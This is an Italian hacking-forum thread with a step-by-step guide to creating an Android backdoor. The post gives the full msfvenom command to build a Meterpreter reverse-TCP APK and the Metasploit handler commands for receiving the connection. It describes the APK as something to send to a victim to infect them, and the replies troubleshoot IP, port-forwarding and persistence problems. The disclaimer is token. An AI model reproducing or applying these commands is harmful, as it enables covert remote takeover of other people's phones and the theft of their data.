The Best Geek Forum

BackDoor Android

Le basi dell'Etica Hacker raccolte in una rubrica che descrive la terminologia di essa prendendo spunto da diversi libri e fatti accaduti.

Moderatore: Moderatore in prova

Come creare una BackDoor
per Android con Linux
Immagine
Molte persone per controllare un dispositivo Android da remoto usa il noto Tool “AndroRat”. Ma siccome a noi di Tebigeek non piace la la “Pappa pronta” andremo a vedere come crearci il nostro RAT con qualsiasi distribuzione Linux!

Questa guida ricordiamo che è solo a scopo illustrativo per testare i vostri dispositivi e non per infettare altri. Tebigeek non si assume nessuna responsabilità dell'uso che ne farete.


Requisiti:

- Una distribuzione Linux (BackBox, Kali, Parrot ecc...)
- Framework Metasploit (Già presente nelle distribuzioni Linux dedicate ai Pen Test, come Kali Linux)
- Un dispositivo Android


In questa guida userò BackBox.

Step 1: Creare il Payload!

Apriamo il terminale su BackBox
Utilizziamo Metasploit per creare l'exploit

Codice: Seleziona tutto

msfvenom -p  android/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=1604 R > /home/the_boss_/Scrivania/Hack.apk 
Immagine

Una volta eseguito il comando avremo un file Hack.apk da inviare alla vittima per infettarla.


Step 2: Impostazioni Connessione

Adesso bisogna predisporre la nostra macchina ad una connessione di tipo reverse_tcp con questi comandi:

Codice: Seleziona tutto

msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp
A questo punto inseriamo i parametri associati al nostro scenario, con questi comandi in fila:

Codice: Seleziona tutto

set lhost 192.168.1.6 –> Indirizzo IP dell'attaccante
set lport 1604 –> porta su cui ascoltare per connessione in entrata (assicurarsi che la porta sia aperta)
exploit –> Avviamo l'ascolto in attesa di connessioni in entrata
Immagine

Quando installeremo l'APK sul dispositivo nel terminale vedremo la connessione in ascolto.
The_BoSs non ho parole...
Sto navigando da Iceweals e proprio ora stavo per ripetere questo attacco nella versione di Kali LInux 2.0, do un'occhiata al forum e...
Ecco qua tutto pronto :yahoooooo: :yahoooooo: :yahoooooo:
Complimenti!
Grazie ;) Devo solo testare se funziona la persistenza cosi faccio la guida ;)

Perchè è seccante che al reboot si perde la connessione.
Ciao The Boss, innanzitutto ottima guida, ho seguito la tua procedura ma mi risulta un problema.
Ti elenco gli screen dei miei passaggi.
Innanzitutto vedo il mio indirizzo ip per l'attacco, premetto che utilizzo virtual box su mac e purtroppo linux in questo modo mi ha dato sempre problemi...
Immagine
utilizzo l'indirizzo sottolineato e la porta 443 perché ho visto che è la porta che dà meno problemi con il router.
Immagine
già da qui si vede un errore cioè non esce payload size.
A questo punto invio l'apk al telefono e lo installo poi continuo con la procedura...
Immagine
da questo punto in poi non va più avanti nonostante l'apk sia installato e avviato sul telefono.
Quale potrebbe essere il problema?
Grazie :D
Mi sa che l'errore lo commetti mettendo l'indirizzo local 127.0.0.1
Devi mettere l'indirizzo IP locale della scheda di rete alla quale è connesso il tuo PC quindi collegare lo smartphone alla stessa rete e quando avvii l'app e fai tap sul pulsante nel terminale che hai appena messo in "stato di attesa" mostra le opzioni che puoi usare con il device.
Se non sbaglio si puo fare anche con l'indirizzo IP pubblico ma bisogna cambiare alcune cose.
Intendi, mettere l'indirizzo ip del router ? Se è così, ho già provato ma non va...
No, non quello del router ma quello della scheda di rete, semplicemente l'IP locale che il DHCP del router ti assegna!
Sì sì ho provato ma non ho risolto lo stesso niente... non so se è un problema solo mio...
E beh a questo punto mi pare di si... :(
Virgula ha scritto:Ciao The Boss, innanzitutto ottima guida, ho seguito la tua procedura ma mi risulta un problema.
Ti elenco gli screen dei miei passaggi.
Innanzitutto vedo il mio indirizzo ip per l'attacco, premetto che utilizzo virtual box su mac e purtroppo linux in questo modo mi ha dato sempre problemi...
Immagine
utilizzo l'indirizzo sottolineato e la porta 443 perché ho visto che è la porta che dà meno problemi con il router.
Immagine
già da qui si vede un errore cioè non esce payload size.
A questo punto invio l'apk al telefono e lo installo poi continuo con la procedura...
Immagine
da questo punto in poi non va più avanti nonostante l'apk sia installato e avviato sul telefono.
Quale potrebbe essere il problema?
Grazie :D
Il pc è collegato tramite ethernet e non wifi giusto?

In LHOST metti l'ip della scheda di rete eth0.

La porta 443 è aperta?

Ti consiglio di chiudere la 443 in quanto sei molto a rischio con quella porta aperta ed aprire un altra.

Assicurati che sia aperta la porta giusta, molti errori si fanno proprio nel port forwarding.

Controlla le tue porte QUI

Con IP Locale dovrebbe andare lo stesso ma sicuramente il cellulare non è collegato alla stessa rete del PC se non funziona.
Se vuoi usarlo in locale con 127.0.0.1 collega il cellulare nella stessa rete del PC.